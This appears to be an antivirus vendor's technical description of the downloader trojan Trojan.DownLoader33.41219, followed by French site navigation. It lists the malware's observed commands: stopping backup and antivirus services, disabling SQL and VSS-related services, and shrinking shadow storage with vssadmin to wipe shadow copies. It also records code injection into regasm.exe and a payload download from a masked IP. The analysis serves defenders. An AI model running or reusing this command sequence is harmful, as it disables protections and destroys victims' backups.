Trojan.DownLoader33.41219

Technical Information

Malicious functions

To complicate detection of its presence in the operating system,

deletes volume shadow copies.

Executes the following

'%WINDIR%\syswow64\net.exe' stop avpsus /y
'%WINDIR%\syswow64\net.exe' stop VeeamNFSSvc /y
'%WINDIR%\syswow64\net.exe' stop veeam /y
'%WINDIR%\syswow64\net.exe' stop PDVFSService /y
'%WINDIR%\syswow64\net.exe' stop BackupExecVSSProvider /y
'%WINDIR%\syswow64\net.exe' stop BackupExecAgentAccelerator /y
'%WINDIR%\syswow64\net.exe' stop BackupExecAgentBrowser /y
'%WINDIR%\syswow64\net.exe' stop BackupExecDiveciMediaService /y
'%WINDIR%\syswow64\net.exe' stop BackupExecManagementService /y
'%WINDIR%\syswow64\taskkill.exe' /IM mydesktopqos.exe /F
'%WINDIR%\syswow64\net.exe' stop BackupExecRPCService /y
'%WINDIR%\syswow64\net.exe' stop AcrSch2Svc /y
'%WINDIR%\syswow64\net.exe' stop AcronisAgent /y
'%WINDIR%\syswow64\net.exe' stop CASAD2DWebSvc /y
'%WINDIR%\syswow64\net.exe' stop CAARCUpdateSvc /y
'%WINDIR%\syswow64\net.exe' stop sophos /y
'%WINDIR%\syswow64\taskkill.exe' /IM mspub.exe /F
'%WINDIR%\syswow64\net.exe' stop VeeamDeploymentService /y
'%WINDIR%\syswow64\net.exe' stop BackupExecJobEngine /y
'%WINDIR%\syswow64\net.exe' stop VeeamTransportSvc /y
'%WINDIR%\syswow64\net.exe' stop SavRoam /y
'%WINDIR%\syswow64\net.exe' stop McAfeeDLPAgentService /y
'%WINDIR%\syswow64\net.exe' stop mfewc /y
'%WINDIR%\syswow64\net.exe' stop BMR Boot Service /y
'%WINDIR%\syswow64\net.exe' stop NetBackup BMR MTFTP Service /y
'%WINDIR%\syswow64\net.exe' stop DefWatch /y
'%WINDIR%\syswow64\net.exe' stop ccEvtMgr /y
'%WINDIR%\syswow64\net.exe' stop ccSetMgr /y
'%WINDIR%\syswow64\net.exe' stop RTVscan /y
'%WINDIR%\syswow64\net.exe' stop stc_raw_agent /y
'%WINDIR%\syswow64\net.exe' stop QBFCService /y
'%WINDIR%\syswow64\net.exe' stop QBIDPService /y
'%WINDIR%\syswow64\net.exe' stop Intuit.QuickBooks.FCS /y
'%WINDIR%\syswow64\net.exe' stop QBCFMonitorService /y
'%WINDIR%\syswow64\net.exe' stop YooBackup /y
'%WINDIR%\syswow64\net.exe' stop YooIT /y
'%WINDIR%\syswow64\net.exe' stop zhudongfangyu /y
'%WINDIR%\syswow64\net.exe' stop VSNAPVSS /y
'%WINDIR%\syswow64\taskkill.exe' /IM mydesktopservice.exe /F

Injects code into

the following system processes:

%WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe

Network activity

TCP

HTTP GET requests

http://19#.#6.29.128/Client-17_nCoOSOQEsU142.bin

Miscellaneous

Searches for the following windows

ClassName: '' WindowName: ''

Creates and executes the following

'%WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe' ' (with hidden window)

Executes the following

'%WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe'
'%WINDIR%\syswow64\net1.exe' stop BackupExecManagementService /y
'%WINDIR%\syswow64\net1.exe' stop BackupExecRPCService /y
'%WINDIR%\syswow64\net1.exe' stop AcrSch2Svc /y
'%WINDIR%\syswow64\net1.exe' stop AcronisAgent /y
'%WINDIR%\syswow64\net1.exe' stop CASAD2DWebSvc /y
'%WINDIR%\syswow64\net1.exe' stop CAARCUpdateSvc /y
'%WINDIR%\syswow64\net1.exe' stop sophos /y
'%WINDIR%\syswow64\sc.exe' config SQLTELEMETRY start= disabled
'%WINDIR%\syswow64\sc.exe' config SQLTELEMETRY$ECWDB2 start= disabled
'%WINDIR%\syswow64\sc.exe' config SQLWriter start= disabled
'%WINDIR%\syswow64\net1.exe' stop Intuit.QuickBooks.FCS /y
'%WINDIR%\syswow64\sc.exe' config SstpSvc start= disabled
'%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=c: /on=c: /maxsize=401MB
'%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=c: /on=c: /maxsize=unbounded
'%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=d: /on=d: /maxsize=401MB
'%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=d: /on=d: /maxsize=unbounded
'%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=e: /on=e: /maxsize=401MB
'%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=e: /on=e: /maxsize=unbounded
'%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=f: /on=f: /maxsize=401MB
'%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=f: /on=f: /maxsize=unbounded
'%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=g: /on=g: /maxsize=401MB
'%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=g: /on=g: /maxsize=unbounded
'%WINDIR%\syswow64\net1.exe' stop BackupExecDiveciMediaService /y
'%WINDIR%\syswow64\net1.exe' stop BackupExecJobEngine /y
'%WINDIR%\syswow64\net1.exe' stop BackupExecAgentBrowser /y
'%WINDIR%\syswow64\net1.exe' stop BackupExecAgentAccelerator /y
'%WINDIR%\syswow64\net1.exe' stop BackupExecVSSProvider /y
'%WINDIR%\syswow64\net1.exe' stop McAfeeDLPAgentService /y
'%WINDIR%\syswow64\net1.exe' stop mfewc /y
'%WINDIR%\syswow64\net1.exe' stop BMR Boot Service /y
'%WINDIR%\syswow64\net1.exe' stop NetBackup BMR MTFTP Service /y
'%WINDIR%\syswow64\net1.exe' stop DefWatch /y
'%WINDIR%\syswow64\net1.exe' stop ccEvtMgr /y
'%WINDIR%\syswow64\net1.exe' stop ccSetMgr /y
'%WINDIR%\syswow64\net1.exe' stop SavRoam /y
'%WINDIR%\syswow64\net1.exe' stop RTVscan /y
'%WINDIR%\syswow64\net1.exe' stop QBFCService /y
'%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=h: /on=h: /maxsize=401MB
'<SYSTEM32>\vssvc.exe'
'%WINDIR%\syswow64\net1.exe' stop QBIDPService /y
'%WINDIR%\syswow64\net1.exe' stop YooBackup /y
'%WINDIR%\syswow64\net1.exe' stop YooIT /y
'%WINDIR%\syswow64\net1.exe' stop zhudongfangyu /y
'%WINDIR%\syswow64\net1.exe' stop stc_raw_agent /y
'%WINDIR%\syswow64\net1.exe' stop VSNAPVSS /y
'%WINDIR%\syswow64\net1.exe' stop VeeamTransportSvc /y
'%WINDIR%\syswow64\net1.exe' stop VeeamDeploymentService /y
'%WINDIR%\syswow64\net1.exe' stop VeeamNFSSvc /y
'%WINDIR%\syswow64\net1.exe' stop veeam /y
'%WINDIR%\syswow64\net1.exe' stop PDVFSService /y
'%WINDIR%\syswow64\net1.exe' stop avpsus /y
'%WINDIR%\syswow64\net1.exe' stop QBCFMonitorService /y
'%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=h: /on=h: /maxsize=unbounded

TECHNOLOGIES

TERMINOLOGIE

COURS ET EDU

MYTHES

Technical Information

Recommandations pour le traitement

Free trial